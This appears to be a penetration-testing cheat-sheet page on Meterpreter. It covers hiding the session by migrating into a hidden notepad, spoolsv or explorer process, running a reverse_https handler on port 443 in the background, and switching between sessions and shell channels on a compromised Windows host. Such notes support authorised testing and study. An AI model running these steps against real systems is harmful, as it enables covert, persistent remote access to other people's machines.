Meterpreter Tricks

Always migrate to common apps for persistence shell.

https://jlajara.gitlab.io/process-migration

Migrate meterpreter to another process

execute new notepad

meterpreter> execute -H -f notepad

# Output: Process 1234 created.

migrate connection to notepad

meterpreter> migrate 1234

# Output: Migration completed successfully

or you can search some reliable program to migrate to.

meterpreter> ps -S spoolsv
# OR
meterpreter> ps -S explorer

run migration with this format migrate <Target PID>

Manage multi session

example

payload -> windows/meterpreter/reverse_https
port -> 443

make sure you listen in msfconsole and have last connection shell

ctrl + z to background current session

PS C:\Windows\Tasks> ^Z
Background channel 1? [y/N] y

you will back to meterpreter>, then background again.

meterpreter > background
msf5 exploit(multi/handler) >

run listener but as a background

msf5 exploit(multi/handler) > exploit -j
<..snip..>
[*] Started HTTPS reverse handler on https://192.168.x.y:443

back to the session 1

msf5 exploit(multi/handler) > session -i 1

# interact with channel 1 in session 1
meterpreter > channel -i 1
Interacting with channel 1. . .
PS C:\Windows\Tasks>

If you need to perform another shell, you can run channel 2 in session 1

PS C:\Windows\Tasks>^Z
Background channel 1? [y/N] y
meterpreter >

launch new shell, to get another shell in channel 2 in session 1.

meterpreter > shell

wanna get back to the session 2?

make sure you background the current channel in session 1

C:\Windows\Tasks^Z
Background channel 2? [y/N] y
meterpreter > background
[*] Backgrounding session 1 ...
msf5 exploit(multi/handler) >

Interact with session 2

msf5 exploit(multi/handler) > session -i 2
[*] Starting interaction with 2...
meterpreter >

PreviousMetasploit NextPrivilege Escalation

Last updated 1 year ago